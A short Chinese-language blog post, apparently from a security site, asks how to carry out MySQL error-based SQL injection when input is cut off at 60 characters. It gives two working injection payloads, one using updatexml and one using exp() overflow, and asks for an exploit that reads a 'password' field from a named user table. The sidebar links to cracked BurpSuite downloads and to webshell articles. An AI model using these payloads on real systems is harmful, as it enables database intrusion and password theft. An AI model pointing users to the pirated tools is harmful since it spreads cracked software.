Mysql报错注入,长度限制
1'and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)#
1'and Exp(~(select*from(select @@version)a))#
都是能注出数据的
但是程序限制了60个字符,多出的直接截断
表名14个字符:0123456789user
字段8个字符:password
能不能构造读出数据的exp?
Mysql报错注入,长度限制
评论(0)
引用(0)
沙发有屎,请自行备纸
发表评论:
生活累,一小半源于生存,一大半源于攀比。
与我联系:戳这里>>
- 热评文章
- 随机文章
- 最近更新
- 最新文章
2016-10-5
BurpSuite 1.7.11破解版下载【附多/新版本下载】
2016-11-5
Connectify Dispatch指定程序使用指定网卡[运维神器]
2014-3-25
网站备案流程_网站备案需要什么[简单明了解决备案各种问题]
2018-2-3
最新BurpSuite 1.7.32 破解版[注册机]下载【无后门版】
2016-11-8
php一句话后门的几种变形分析[preg_replace函数]
2016-10-24
charles使用教程指南 - px1624
2016-10-24
雅虎某分站的XSS导致雅虎邮箱沦陷 - mramydnei
2016-10-24
Oracle安全配置 - zhangsan
2021-9-5
[网盘下载] GB∕T 28448-2019 信息安全技术网络安全等级保护测评要求.pdf
2016-10-24
基于Ruby的Burpsuite插件开发 - 等TA回来
云悉指纹